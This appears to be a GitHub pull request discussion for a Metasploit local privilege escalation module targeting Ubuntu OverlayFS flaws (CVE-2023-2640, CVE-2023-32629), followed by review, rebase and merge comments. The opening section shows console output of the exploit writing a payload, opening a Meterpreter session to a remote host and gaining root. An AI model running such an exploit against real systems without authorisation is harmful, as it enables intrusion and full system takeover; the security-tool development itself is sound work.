rmsf6 exploit(linux/local/gameoverlay_privesc) > run

[-] Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/gameoverlay_privesc) > set session 7
session => 7
rumsf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory to store payload: /tmp/fQUjBSq/
[*] Creating directory /tmp/fQUjBSq/
[*] Creating directory /tmp/fQUjBSq/aBbfZQAtd/
[*] Creating directory /tmp/fQUjBSq/ipGtJZ/
[*] Creating directory /tmp/fQUjBSq/lhwOKOXG/
[*] Creating directory /tmp/fQUjBSq/RtMgBtIyVpn/
[*] Writing payload: /tmp/fQUjBSq/marv
[*] 
[*] Started bind TCP handler against 54.173.113.139:4444
[*] Sending stage (3045380 bytes) to 54.173.113.139
[+] Deleted /tmp/fQUjBSq/
[*] Meterpreter session 8 opened (192.168.0.239:49872 -> 54.173.113.139:4444) at 2024-10-15 10:41:31 -0400

meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > getuid
Server username: root
```
Additionally I've added randomization to the bash copy, it appears to be running properly but I couldn't fully test it due to hardware issues. If someone could test `cmd` targets that would help !

**
![image](https://github.com/user-attachments/assets/ba0f0455-f931-41c4-adb9-f5d1fd77ec2c)
**

2024-10-30 19:24 UTC, bwatters-r7 commented
Hey there, @gardnerapp; I am sorry I let this fall by the wayside, and I want to get this merged and landed because it is pretty darn cool.  Is there a reason you included the netcat binary in this?

2024-10-30 19:28 UTC, bwatters-r7 commented
Also, I want to get https://github.com/rapid7/metasploit-framework/pull/19528 landed so we can use it for the command execution.

2024-10-31 15:15 UTC, gardnerapp commented
> Hey there, @gardnerapp; I am sorry I let this fall by the wayside, and I want to get this merged and landed because it is pretty darn cool. Is there a reason you included the netcat binary in this?

Not sure why I committed NC, pretty sure it was by accident. It can be scrapped and thrown out. Sorry about that.

2024-11-18 23:10 UTC, bwatters-r7 commented
@gardnerapp I would like to rebase and squash a lot of these commits, but I wanted to let you know and get your OK before I do it.  I don't know how familiar you are with git, so forgive me if I'm over-explaining things: 
I can do all of the rebasing and fixing, but it would mean that I'd force-push on top of this branch and lots of the commits will get squashed together.  It makes for a more streamlined merge by combining minor change commits together into a larger commit.  Same result, just fewer commits.

2024-11-19 01:43 UTC, gardnerapp commented
@bwatters-r7 Do whatever you have to do I don't mind. I hope I didn't cause to much trouble for you, I'm new to developing msf. Lmk if you need help.

2024-11-19 15:10 UTC, bwatters-r7 commented
> @bwatters-r7 Do whatever you have to do I don't mind. I hope I didn't cause to much trouble for you, I'm new to developing msf. Lmk if you need help.

Done; no worries at all.  I really enjoy working with people who are new to the project; I was new to it not that long ago!

Everything looks right on the rebase- we dropped from 63 commits to 9.  If you see anything that does not look right, please let me know,  

Next step is that we found what looks like a bug in pre-existing code related to this PR that I'm going to add a fix to here because it is a great place to test it.

2024-12-17 22:57 UTC, bwatters-r7 commented
OK..... it was not a bug in framework, it was a bug with the code I added and using a more complex payload brought it out, so I was worried it was an issue with the payload.
I had to fix up some escapes for the cmd payloads so that more complex cmd payloads worked.

2024-12-18 20:42 UTC, smcintyre-r7 approved these changes

2024-12-18 20:44 UTC, merged

2024-12-18 20:46 UTC, bwatters-r7 commented
# Release Notes
Adds a module for CVE-2023-2640 and CVE-2023-32629, a local privilege escalation in some Ubuntu kernel versions by abusing overly-trusting OverlayFS features.